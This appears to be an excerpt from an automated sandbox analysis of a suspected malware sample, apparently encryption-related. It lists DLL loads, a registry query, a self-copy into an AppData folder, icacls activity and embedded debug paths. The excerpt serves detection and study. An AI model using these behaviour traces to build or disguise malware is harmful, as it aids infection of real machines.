        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: taskschd.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: pcacli.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\SysWOW64\icacls.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: taskschd.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: drprov.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: winsta.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: ntlanman.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: davclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: davhlpr.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: cscapi.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: browcli.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: drprov.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: winsta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: ntlanman.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: davclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: davhlpr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: cscapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: browcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: mpr.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: wininet.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: winmm.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: iphlpapi.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: dnsapi.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: iertutil.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: sspicli.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: profapi.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: winhttp.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: mswsock.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: winnsi.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: dpapi.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: msasn1.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: cryptsp.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: rsaenh.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: cryptbase.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: gpapi.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: urlmon.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: srvcli.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: netutils.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: fwpuclnt.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: rasadhlp.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: schannel.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: mskeyprotect.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: ntasn1.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: ncrypt.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: ncryptsslp.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: mpr.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: wininet.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: winmm.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: iphlpapi.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: dnsapi.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: iertutil.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: sspicli.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: profapi.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: winhttp.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: mswsock.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: winnsi.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: dpapi.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: msasn1.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: cryptsp.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: rsaenh.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: cryptbase.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: gpapi.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: urlmon.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: srvcli.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: netutils.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: fwpuclnt.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: rasadhlp.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: schannel.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: mskeyprotect.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: ntasn1.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: ncrypt.dll
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: ncryptsslp.dll
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
        Source: tsnsd8pOvn.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: tsnsd8pOvn.exe, tsnsd8pOvn.exe, 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3368265368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000008.00000002.3368242009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000A.00000002.2340871565.0000000002250000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000B.00000002.2353527786.0000000000400000.00000040.00000400.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000C.00000002.2413430866.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000D.00000002.2423749353.0000000000400000.00000040.00000400.00020000.00000000.sdmp
        Source: Binary string: 785491~1.PCQntkrnlmp.pdb5 source: tsnsd8pOvn.exe, 00000007.00000003.3348783123.00000000030FB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\laru_subokalimagomaduvoja mawezozuyoyohuhupuk-zenakejus.pdb source: tsnsd8pOvn.exe, tmpF2E2.tmp.7.dr, tsnsd8pOvn.exe.2.dr
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\mpS source: tsnsd8pOvn.exe, 00000007.00000003.3348757761.0000000003179000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3370588549.0000000003178000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: tsnsd8pOvn.exe, 00000007.00000003.3348783123.00000000030FB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: &5(C:\laru_subokalimagomaduvoja mawezozuyoyohuhupuk-zenakejus.pdb.pdbX source: tsnsd8pOvn.exe, tmpF2E2.tmp.7.dr, tsnsd8pOvn.exe.2.dr
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\e\E source: tsnsd8pOvn.exe, 00000007.00000003.3348783123.0000000003118000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3370588549.0000000003118000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: tsnsd8pOvn.exe, 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3368265368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000008.00000002.3368242009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000A.00000002.2340871565.0000000002250000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000B.00000002.2353527786.0000000000400000.00000040.00000400.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000C.00000002.2413430866.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000D.00000002.2423749353.0000000000400000.00000040.00000400.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\2 source: tsnsd8pOvn.exe, 00000007.00000003.3347231152.0000000003120000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000003.3348783123.0000000003118000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3370588549.0000000003118000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\\*] source: tsnsd8pOvn.exe, 00000007.00000003.3347231152.0000000003120000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000003.3348783123.0000000003118000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3370588549.0000000003118000.00000004.00000020.00020000.00000000.sdmp
